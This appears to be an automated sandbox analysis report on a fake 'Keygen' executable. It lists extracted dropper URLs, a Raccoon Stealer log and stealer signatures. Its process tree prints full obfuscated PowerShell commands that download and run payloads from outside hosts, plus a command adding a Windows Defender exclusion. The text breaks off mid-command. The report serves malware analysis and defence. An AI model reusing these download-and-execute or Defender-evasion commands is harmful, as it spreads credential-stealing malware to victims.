Overview

overview

10

Static

static

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

8

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

8

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...en.exe

windows7_x64

10

201001-nyh...en.exe

windows10_x64

10

Resubmissions

02-10-2020 21:14

201002-pjxdl9y6a6 10

01-10-2020 20:51

201001-e45lwcxsnn 10

01-10-2020 20:51

201001-fhxddb9gwe 10

01-10-2020 20:51

201001-ts8hns28ea 10

01-10-2020 20:51

201001-v1kt3kgljx 10

01-10-2020 20:51

201001-d2fbtjzv4s 10

01-10-2020 20:51

201001-cgj9prs442 10

01-10-2020 20:49

201001-t1jnpvwcgx 10

Analysis

  • max time kernel
    51s
  • max time network
    153s
  • platform
    windows10_x64
  • resource
    win10
  • submitted
    01-10-2020 20:51

General

  • Target

    201001-nyhbt4p25j_pw_infected/Keygen — копия (56) — копия.exe

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Path

C:\Users\Admin\AppData\LocalLow\machineinfo.txt

Family

raccoon

Ransom Note
[Raccoon Stealer] - v1.5.13-af-hotfix Release Build compiled on Mon Jul 6 14:33:02 2020 Launched at: 2020.10.02 - 04:14:29 GMT Bot_ID: 664A9041-4AC4-46F3-B3DC-87DB4D57890E_Admin Running on a desktop =R=A=C=C=O=O=N= - Cookies: 0 - Passwords: 5 - Files: 0 System Information: - System Language: English - System TimeZone: -0 hrs - IP: 154.61.71.51 - Location: 37.750999, -97.821999 | ?, ?, United States (?) - ComputerName: GOHCSFBB - Username: Admin - Windows version: NT 10.0 - Product name: Windows 10 Pro - System arch: x64 - CPU: Persocon Processor 2.5+ (2 cores) - RAM: 4095 MB (835 MB used) - Screen resolution: 1280x720 - Display devices: 0) Microsoft Basic Display Adapter ============

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Contains code to disable Windows Defender 4 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon log file 1 IoCs

    Detects a log file produced by the Raccoon Stealer.

  • ModiLoader First Stage 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 25 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 1 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies registry class 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 39 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (56) — копия.exe
    "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (56) — копия.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3600
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2466.tmp\start.bat" "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — ????? (56) — ?????.exe""
      2⤵
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:1036
      • C:\Users\Admin\AppData\Local\Temp\2466.tmp\Keygen.exe
        Keygen.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:1644
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\2466.tmp\m.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2020
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2324
          • C:\Users\Public\zsx.exe
            "C:\Users\Public\zsx.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:5064
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:2280
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                PID:804
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /pid 804 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\582477732416689\\* & exit
                  8⤵
                    PID:1336
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /pid 804
                      9⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4408
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:4284
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:1516
              • C:\Users\Public\zsx.exe
                "C:\Users\Public\zsx.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Drops desktop.ini file(s)
                PID:580
                • C:\Users\Admin\AppData\Local\Temp\Ea3w2EltQT.exe
                  "C:\Users\Admin\AppData\Local\Temp\Ea3w2EltQT.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4744
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
                    "Powershell" Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Local\Temp\Ea3w2EltQT.exe"'
                    8⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4340
                • C:\Users\Admin\AppData\Local\Temp\kBxEGE2rjE.exe
                  "C:\Users\Admin\AppData\Local\Temp\kBxEGE2rjE.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:3940
                • C:\Users\Admin\AppData\Local\Temp\zrVXQaA0ri.exe
                  "C:\Users\Admin\AppData\Local\Temp\zrVXQaA0ri.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of SetWindowsHookEx
                  PID:4612
                  • \??\c:\windows\SysWOW64\cmstp.exe
                    "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\fhuxciqz.inf
                    8⤵
                      PID:3456
                  • C:\Users\Admin\AppData\Local\Temp\SPqXG8aYPJ.exe
                    "C:\Users\Admin\AppData\Local\Temp\SPqXG8aYPJ.exe"
                    7⤵
                    • Executes dropped EXE
                    • Windows security modification
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4504
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "powershell" Get-MpPreference -verbose
                      8⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4092
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\zsx.exe"
                    7⤵
                      PID:4476
                      • C:\Windows\SysWOW64\timeout.exe
                        timeout /T 10 /NOBREAK
                        8⤵
                        • Delays execution with timeout.exe
                        PID:1300
            • C:\Windows\SysWOW64\mshta.exe
              "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\2466.tmp\m1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2212
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3792
            • C:\Windows\SysWOW64\timeout.exe
              timeout 1
              3⤵
              • Delays execution with timeout.exe
              PID:2220
            • C:\Windows\SysWOW64\mshta.exe
              "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\2466.tmp\b.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2396
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof 